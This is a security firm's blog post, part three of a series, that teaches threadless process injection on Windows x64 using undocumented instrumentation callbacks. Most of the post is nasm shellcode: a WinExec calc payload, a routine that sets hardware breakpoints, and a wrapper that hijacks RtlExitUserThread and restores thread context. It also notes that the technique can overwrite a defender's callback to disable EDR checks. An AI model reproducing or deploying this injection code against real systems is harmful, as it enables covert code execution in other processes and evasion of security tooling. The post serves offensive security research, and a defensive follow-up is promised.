Search

Windows Instrumen­tation Call­backs – Part 3

January 28, 2026

Windows Instrumentation Callbacks – Injections, Part 3

Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

If you have not yet read the first and second part of this series, we strongly recommend you read it to find out what ICs are and how to set them.

In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Disclaimer

  • This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
  • This series is aimed at x64 programs on the Windows versions 10 and 11. Neither older Windows versions nor WoW64 processes will be discussed.
  • This post contains much assembly code; don’t be a script kiddie – take your time to understand what you’re doing instead of just copy-pasting!

Recap

In the first blog post we learned how to install an IC on a process and how to use that callback to interact with specific syscalls.

We learned this by the example of intercepting the syscall made by OpenProcess inside the subfunction NtOpenProcess. After intercepting NtOpenProcess, we closed the handle that was opened and spoofed a return value of STATUS_ACCESS_DENIED.

In the second part of the series, we learned how to hook arbitrary code in the current process context with ICs using exceptions.

However, we haven’t yet set an IC on another process even though we learned in the first part of this series that this should be possible with the SeDebugPrivilege. Due to the IC getting executed as a callback to every returning syscall, setting an IC on another process would mean getting code execution in that processes’ context, which can be used for a process injection.

Process injection

If you understood the blog series so far, it is very likely that you know what a process injection is. Let’s break down what is normally needed for a regular process injection, that is injecting code into another process. Depending on whether you’re familiar with the concept of virtual address spaces and virtual memory in general, trying to access memory in another process would result in expected or unexpected results. The code normally needs to get written to the other process. Obviously, to write the code to the other process’ memory space, you need to have a handle to the process with sufficient permissions and need to know where to write the code. For this you normally have two options: allocating memory in the other process context or overwriting an existing executable memory region. After the code was written to an executable memory region, it needs to get executed. The most basic process injections use the CreateRemoteThread function for this. Other execution mechanisms are, for example, API hooking, early bird APC injections or thread hijacking. There are many ways, but they all effectively just execute the written code. There are multiple websites online that collect different execution mechanisms; however, most don’t include ICs. While researching ICs, I found a blog post by Black Lantern Security about detecting process injections. They briefly mentioned using ICs for call stack analysis to detect injections, which is a great use case for them, but it can also be used for exactly what it should detect. That would also have the bonus effect of overwriting their IC, basically removing those security checks. In the next part of this blog series, we will cover ICs from a more defensive standpoint and how to protect against your own IC being overwritten.

I also found a blog post by splinter_code who seems to have already written a blog post about using ICs for process injections in 2020. Don’t worry, we will of course expand on that and not copy his work. How complicated your IC injection code needs to be heavily depends on your payload. Assume you, for example, only want to make one WinExec call and your payload in total got like ten assembly operations, this won’t add a massive overhead to your program. You could just directly call the payload in the IC (assuming you added a way to disable syscall recursion in the IC), but once you use a payload that yields, for example a C2 agent, the program will stop working/run into issues because a required thread was hijacked. splinter_code solved this by creating a new thread, which is a valid approach. However, I wanted to avoid thread creation callbacks. So, how do we execute code without spawning a new thread and without causing the thread that called the IC to yield for long? By instead spawning a process. Just kidding, let’s reuse the hooking method we used in the previous blog post and instead hook a thread exit to hijack the thread. Threadless injections are no novel concept, but they normally use byte patches or register an exception handler for patchless hooking. Using ICs we can avoid registering an exception handler. In our case we still set a hardware breakpoint, but you could also, for example, use page guards.

To keep this post brief, we will not cover the following relevant topics, as they are not specific to this injection technique and there are multiple ways of implementing those: process ID enumeration, handle opening, memory allocation, memory writing.

Only one note on handle opening: a cautious reader of the OpenProcess MSDN page might’ve read the following part: “If the caller has enabled the SeDebugPrivilege privilege, the requested access is granted regardless of the contents of the security descriptor.” As said in the recap, we found out that the SeDebugPrivilege is required to set an IC on another process in the first blog post. Herein lays the fundamental “problem” of using an IC as an injection technique. The SeDebugPrivilege is a very powerful privilege, as it effectively disables security checks. This means, the injector already needs extensive privileges on the computer to use an IC as an injection technique. As mentioned by Microsoft, members of the Administrators group have the SeDebugPrivilege by default. This also means that for you to test your injector you need that privilege, for example by launching the injector from an administrative PowerShell.

Core injection logic

To simplify the rest of the blog post, let’s define some words that we will use:

  • Payload: This is the code that should get executed as the goal of the injection, in our case it will be a WinExec call that spawns a calculator. In your case it could be whatever, it could for example also be a manual mapper that maps an entire DLL into the victim process.
  • Payload wrapper: This includes all the code that sets up the payload execution. We will define the specific requirements later, but the wrapper is what the IC will execute. It is basically the IC bridge from the previous posts with some additional logic, just that it is this time injected into another process for the IC to execute there and not in its own process context. The wrapper remains static, only the payload changes.
  • Wrapped payload: Both the payload and the payload wrapper. The wrapped payload will be allocated and written to the victim process, not the payload and payload wrapper individually.

In the previous two blog posts we did not delve further into the build system, as we simply linked our C++ code with the assembly IC bridge; however, this isn’t what we will be doing this time. Both the payload and payload wrapper need to be position-independent, as they shouldn’t be executed in our process’s context but instead the victim’s. This also means that we need both the starting address and the size of the assembly code to copy it over to the other process. I find the easiest way to do this is to write the entire shellcode in an assembly file and then use a build system such as CMake with pre-compile steps to first assemble the assembly and then write them to a C++ header file that simply contains a C++ array with the assembled bytes in it.

In other words: the CMakeLists.txt file contains multiple add_custom_commands, which first executes the assembler (we’re using nasm), then uses objcopy to copy out the .text section of the object file into a temporary binary file and then executes a Python script to read in the binary file and converts it into a C++ array, which is written to a header file that is part of the CMake targets’ sources. In this case, we only did this for the payload wrapper.

Payload

As mentioned before, we’re using nasm as assembler for this post. “;” marks comments in nasm.

For our testing we used the following hard-coded payload:

mov ecx,0x636c6163 ; calc
push rcx
mov rcx, rsp
mov r14,0x7fffffffffffffff ; will be replaced with WinExec

sub rsp, 0x28 ; Shadow space + alignment
call r14
add rsp, 0x30
ret

 

Lino Facco

Consultant

Lino Facco

Consultant

Category
Date
Navigation

As can be seen, a null-terminated “calc” string is pushed onto the stack and used as an argument to a call to 0x7fffffffffffffff after the stack was aligned (RSP % 0x10 = 0).

But why are we using 0x7fffffffffffffff as a call target? We aren’t, we are simply using it as a placeholder. ASLR changes the memory address of, among other things, WinExec. This means, WinExec’s address isn’t known at compile time. There are two solutions for this:

  1. We add a dynamic resolution function to the shellcode with, for example, a PEB walk.
  2. We abuse the fact that ntdll, kernel32 and kernelbase (the DLLs we will require) have the same base address in all processes, as it only gets changed on a reboot. This means, the address of WinExec in the injector is the same as in the process to inject into.

In this case we utilize option 2 to keep the shellcode small. Using a search function, 0x7fffffffffffffff will be replaced before it is injected into the other process to update it to its correct address. This is possible because, as mentioned, we copy the assembled bytes of the assembly code to an array, meaning the required bytes are not in R-X memory but in RW-. This could of course also be rewritten so that it reads in a payload instead of having it hard-coded.

The payload can be anything, as long as it considers the following restrictions:

  • Needs to be position-independent
  • Needs to properly restore the stack after execution or terminate its own thread

Payload wrapper

So, what does the payload wrapper need to include? Everything to correctly set up the payload execution, in other words all the IC logic. First off, we don’t want our payload to execute multiple times, so in our example have multiple calculators pop up. That means, if we don’t want to unregister our IC after execution, we need a flag to signal when the payload was already executed. As the payload should execute once in the entire process and not once every thread, we will need a process-wide flag. We will implement a process-wide flag and not unregister the IC, as we can’t spoon-feed you everything 😉

Also, as mentioned, we will be setting a hardware breakpoint on a thread exit (RtlExitUserThread). It would be very inefficient if we set the hardware breakpoint again and again on every IC call. So, we will also need a thread-local flag to signal when the breakpoint was set, so this step will be skipped on all following IC calls from that thread.

The injected IC should execute the following rough pseudo-code logic:

bool payload_executed = false
bool thread_set_hardware_bp = false
callback(void* ic_origin) {
if (!payload_executed && !thread_set_hardware_bp) {
   thread_set_hardware_bp = true
   if (!set_hwbp(RtlExitUserThread)) // Does syscall
     thread_set_hardware_bp = false   
   return
}
if (!is_exception(ic_origin))
   return
if (exception_origin() != RtlExitUserThread)
   return
remove_hwbp(RtlExitUserThread) // Does syscall
if (!payload_executed) {
   payload_executed = true 
   execute_payload() // (Most likely) does syscall
}
restore_context()
}

In the previous posts we used a flag to avoid recursion; in this case we don’t need a second thread flag. The only way for a syscall to happen if the exception doesn’t come from our breakpoint is through set_hwbp, which is why the flag is enabled before the function call and unset if the breakpoint wasn’t set successfully.

This means, GetThreadContext and SetThreadContext, the two functions issuing a syscall down the line, trigger the IC again but since they aren’t the expected exception they just return from the IC.

A process-local flag can be set by allocating memory with read and write permissions and using a certain address as a flag. As we want to avoid any RWX memory allocations, we will need two memory regions with different permissions: RW- for the flag and R-X for the code itself. RWX allocations should be avoided due to them being highly suspicious. This causes another issue: the flag address can’t be known at runtime due to being dynamically allocated. If we allocated the memory for the flag from inside the executable code that was written to the victim process, we would only have the address of the flag in the same IC call in which the flag was allocated, due to the memory region being not writable, so we couldn’t store it.

Our solution for this is to use a placeholder address for the flag such as with the WinExec address in the payload. The injector first allocates the memory for the flag and then searches for the placeholder inside the compiled wrapper that was written to an array through prebuild steps, replaces it with the address of the allocated memory and only then writes the wrapper to the victim process.

Setting a hardware breakpoint

As mentioned, we will use the same hooking technique used in the previous blog post to hook RtlExitUserThread, just that this time we will need to inject that code into the other process meaning it needs to be position-independent shellcode instead of a regular C++ function. This does not only apply to setting the hardware breakpoint but all the code that needs to get injected. As this is a bunch of assembly instructions, let’s start by writing the helper functions before the core execution logic.

The following code basically does the following:

bool set_dr(DWORD64 bp_address, bool enable) {
CONTEXT context = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };
GetThreadContext(GetCurrentThread(), &context);
context.Dr3 = bp_address;
context.Dr7 |= 1ULL << 6;
SetThreadContext(GetCurrentThread(), &context);
}

Approximately this can be done with the following code; we just hard-coded the usage of Dr3 for no specific reason. You could of course also use other debug registers or add the possibility to add all of them.

; rcx = breakpoint address
; rdx = Enable (1) / Disable (0)
; Return: Rax != 0 = success
; RSP needs to be aligned
set_dr:
   ; Save used registers
   push r14
   push r13
   push rdi
   push rbx
   mov r13, rcx
   mov rbx, rdx
   sub rsp, 0x4d8 ; Size of CONTEXT struct + 8 alignment
   mov rdi, rsp ; CONTEXT base
   mov r14, rdi ; rep stosq changes rdi, this is backup
   ; Zero CONTEXT struct
   mov rcx, 0x9a ; (4d0 / 8) --> amount of uint64_t's
   xor rax, rax
   rep stosq
   ; CONTEXT_DEBUG_REGISTERS
   mov dword [r14 + 0x30], 0x00100010
   ; GetCurrentThread() == -2
   xor rcx, rcx
   dec rcx
   dec rcx
   ; The saved CONTEXT base
   mov rdx, r14
   ; Shadow space
   sub rsp, 0x20
   ; GetThreadContext placeholder
   mov rdi, 0x6CCCCCCCCCCCCCCC
   call rdi
   add rsp, 0x20 ; Shadow space
   ; if return value == 0 it errored
   test rax, rax
   jz _set_dr_ret
   ; Set Dr3
   mov qword [r14 + 0x60], r13
   ; offsetof(CONTEXT, Dr7) = 0x70
   mov rcx, [r14 + 0x70]
   ; Clear Dr3 specific bits
   and rcx, ~((3 << 16) | (3 << 18) | (1 << 6)) 
   test rbx, rbx
   jz _skip_enable_bp
  ; Set local Dr3 enable (Execution type execute = 0 & length needs to be 0)   
  or rcx, (1 << 6) 
_skip_enable_bp:
   ; Dr7 = new Dr7
   mov [r14+0x70], rcx
   ; SetThreadContext
   xor rcx, rcx
   dec rcx
   dec rcx
   mov rdx, r14
   ; Shadow space
   sub rsp, 0x20
   ; GetThreadContext placeholder
   mov rdi, 0x5CCCCCCCCCCCCCCC
   call rdi
   add rsp, 0x20 ; Shadow space
_set_dr_ret:
   add rsp, 0x4d8 ; + 8 alignment
   pop rbx
   pop rdi
   pop r13
   pop r14
   ret

Flag helper functions

For the process-wide flag, we will use a placeholder (0x2CCCCCCCCCCCCCCC), which will be replaced at runtime. For the thread-local one, we will again use the Thread Environment Block. There are more unsuspicious ways of doing this.

load_bp_set_ptr_into_rcx:
; TEB 
mov rcx, gs:[30h]
; TEB->InstrumentationCallbackDisabled 
add rcx, 1b8h
ret
load_bitflag_into_rcx:
; rcx = pointer bit flag (placeholder currently)
mov rcx, 0x2CCCCCCCCCCCCCCC
ret

Execution logic

Looking back at the pseudo code, we got set_hwbp and remove_hwbp covered and now also got access to the two flag variables through the helper functions, so let’s get to implementing the core logic. I didn’t mention one requirement in the pseudo code: stack alignment. Callbacks aren’t always guaranteed to be aligned (RSP % 0x10 != 0, sometimes RSP % 0x10 = 8). To avoid issues, we are manually aligning the stack so all Windows API calls and also the payload call is 16 bytes aligned. So that the stack can be properly restored, we aren’t simply overwriting RSP but instead push a placeholder to check when returning if the stack was adjusted.

entry:
; The actual return address of the IC
push r10
push r14
mov r14, rsp
add r14, 0x10
push rax
push rcx
push rdx
; Rsp should be aligned for both cases, so it’s done here
mov rdx, rsp
and dl, 0xF
cmp dl, 0x8
jne _skip_align
mov rdx, 0xDEADBEEF
push rdx
_skip_align:
call load_bp_set_ptr_into_rcx
xor rax, rax
cmp [rcx], rax
je _hwbp_is_set
; “is_exception” check and payload execution
_hwbp_is_set:
; […]
_ret_unalign:
; Unalign rsp if it was previously modified
cmp dword [rsp], 0xDEADBEEF
jne _ret
add rsp, 8
_ret:
pop rdx
pop rcx
xor rcx, rcx
pop rax
pop r14
; r10 still on top of stack à return to it
ret

First execution

To follow the execution flow logically, let’s first cover what happens when an IC is first triggered in a thread (_first_execution_in_thread). Let’s look at the relevant excerpt from the pseudo code:

[…]
if (!payload_executed && !thread_set_hardware_bp) {
   thread_set_hardware_bp = true
   if (!set_hwbp(RtlExitUserThread)) // Does syscall
     thread_set_hardware_bp = false   
   return
}
[…]

The first line of this pseudo code was already partially written in the execution logic chapter. Only the first part of the if statement, whether the payload was executed or not, is missing. In addition to checking that, we need to set the flag that the hardware breakpoint was set to not call the IC recursively. If setting the HWBP wasn’t successful, the flag should be unset.

As we already wrote our helper functions to retrieve the flag addresses and set a breakpoint, this is simply a matter of combining things:

_hwbp_is_set:
call load_bitflag_into_rcx
xor rax, rax
inc rax
; Was payload already executed? If yes, don’t set BP
cmp [rcx], rax
je _ret_unalign
 ; Set BP set flag to avoid recursion
call load_bp_set_ptr_into_rcx
 xor rax, rax
inc rax
; bp set flag = 1
mov [rcx], rax
; RtlExitUserThread placeholder
mov rcx, 0x3CCCCCCCCCCCCCCC
xor rdx, rdx
inc rdx ; Enable hwbp
call set_dr
; Failed (rax != 0)?
test rax, rax
jnz _ret_unalign
;  bp set flag = 0 to retry on the next IC trigger
call load_bp_set_ptr_into_rcx
xor rax, rax
mov [rcx], rax
; Fall through on purpose to return
_ret_unalign
; […]

After HWBP was set

Let’s look back at the pseudo code for all this to function. We already wrote the code for the first execution within a thread and the logic to set a HWBP. All that’s left to do now is the following excerpt from the pseudo code:

bool payload_executed = false
bool thread_set_hardware_bp = false
callback(void* ic_origin) {
[…]
if (!is_exception(ic_origin))
   return
if (exception_origin != RtlExitUserThread)
   return
remove_hwbp(RtlExitUserThread) // Does syscall
if (!payload_executed) {
   payload_executed = true 
   execute_payload() // (Most likely) does syscall
}
restore_context()
}

We already implemented most of the required logic in the second part of this series – just in C++. If you are unsure how to detect whether the IC was triggered by a HWBP and how to restore execution after a HWBP was triggered, we recommend reading the second part of this series again and then returning to this point. We will, for example, not again explain how we know that we need to intercept KiUserThreadExceptionDispatcher.

Alright, back to coding:

; […]
; Check if the hardware breakpoint was triggered
; KiUserThreadExceptionDispatcher placeholder
   mov rcx, 0x4CCCCCCCCCCCCCCC
   cmp r10, rcx
   jne _ret_unalign
; r14 is still the top of the original stack
; this should be a CONTEXT*, if it is a nullptr its bad :)
   test r14, r14
   jz _ret_unalign
   ; Exception thrown, but is it ours?
   ; RtlExitUserThread placeholder
   mov r10, 0x3CCCCCCCCCCCCCCC
   mov rcx, [r14+0xf8]
   cmp r10, rcx
   ; Not our exception
   jne _ret_unalign
   ; Unset bp
   xor rcx, rcx
   xor rdx, rdx
   call set_dr
   call load_bitflag_into_rcx
   ; Save context base
   push r14
   ; payload was already executed
   cmp qword [rcx], 1
   je _restore_context
   ; Set payload executed flag
   mov qword [rcx], 1
   sub rsp, 0x20
   call payload
   add rsp, 0x20
   ; as you can see, the payload needs to not mangle the stack
   ; otherwise it should call RtlExitUserThread itself
   ; if it mangled the stack rcx wouldn’t be the context base in the next line
_restore_context:
   ; Restore context base to rcx     
   pop rcx
   ; Set ResumeFlag in EFlags register
   or dword [rcx+0x44], 0x10000
   ; ExceptionRecord = nullptr
   xor rdx, rdx
   ; Call RtlRestoreContext
   sub rsp, 0x20
   mov rdi, 0x8CCCCCCCCCCCCCCC
   call rdi
   ; RtlRestoreContext doesn’t return

If you were a careful reader and/or followed along and tried to assemble the code yourself, you might’ve noticed that the ‘payload’ label is missing. Where does it come from? Easy, we just added the payload label at the end of all our code to use a relative reference. That way we can just add the payload to the end of the payload wrapper and it will be able to execute the payload, even if the payload and the wrapper were assembled separately and the byte arrays were just added to each other.

If you made it this far and understood what we were doing, congrats! You’ve pulled through, now we can finally transition back to C++.

C++ code

If you followed our recommendation of using CMake/a build system with prebuild steps to assemble the assembly for you and transform it to a byte array, you should most likely have two arrays now: one for your payload and one for the wrapper. If you only got one fixed payload you always want to use after compilation, you could of course also directly assemble both the payload and the wrapper together or directly copy them together with prebuild steps.

Now you need to replace the placeholders in that/those byte arrays. You could of course also add a PEB walk to dynamically retrieve the required function addresses and not use placeholders; we decided against this for our wrapper for size reasons and to keep the blog post brief.

Talking about that, the blog post is already pretty long so we’ve decided to not add any of our C++ code 😉. If you understood the blog series so far, searching for 8-byte numbers in a byte array and replacing them should be an easy task for you. If you go through the assembly again, you will need to replace the placeholders 0x2CCCCCCCCCCCCCCC till 0x8CCCCCCCCCCCCCCC. The placeholders are commented with what function they require. The flag placeholder simply requires a 1-byte allocation with read and write permissions in the target process.

After replacing the placeholders and adding them to one array/vector, that data needs to be written to an executable memory region in the victim process. For this, obviously an opened handle is required that allows memory writing and memory allocations if any allocations are done. After the shellcode was copied over, an IC needs to be set on the other process with the callback being specified as the start of the copied shellcode. For this, a handle with the PROCESS_SET_INFORMATION access mask is required. Keep in mind that you require the SeDebugPrivilege to set an IC onto another process. You can, for example, start your program from an administrative PowerShell.

Closing words

In this blog post you learned how to write the shellcode required to inject shellcode into another process with ICs. You hopefully also managed to write the required C++ code yourself. This is of course not the only way to utilize ICs for injections. To my knowledge ICs are the most powerful feature of Windows usable in user mode. In general, we only covered a fraction of what is possible with ICs, for example we haven’t covered getting callbacks to APCs with them.

ICs aren’t only usable in offensive ways though; they are, for example, also very interesting for EDRs and anti-cheats.

Three parts of this series were about mainly offensive use cases of ICs. In the next and last part of this series, we will discuss ICs from a more defensive standpoint: how they can be detected and how to detect if someone overwrote your IC.

Further blog articles

Do you want to protect your systems? Feel free to get in touch with us.
Search
Search